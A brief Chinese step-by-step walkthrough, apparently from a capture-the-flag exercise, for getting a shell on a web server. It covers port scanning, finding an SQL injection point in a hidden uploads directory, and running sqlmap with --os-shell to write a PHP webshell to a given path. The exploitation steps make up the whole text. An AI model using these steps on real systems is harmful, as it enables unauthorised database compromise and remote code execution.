1.扫描端口
2.根据扫描到的端口进入地址
3.进入这个目录/se3reTdir777/uploads/
4.判断是否存在sql注入
5.进行抓包,将得到的数据包复制出来保存成一个txt文件
6.在uid前加一个*后保存文件
7.打开sqlmap 输入python sqlmap.py -r 1.txt --os-shell
8.选择[4]php后再选择[2]custom location
再输入路径/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
即可获得shell权限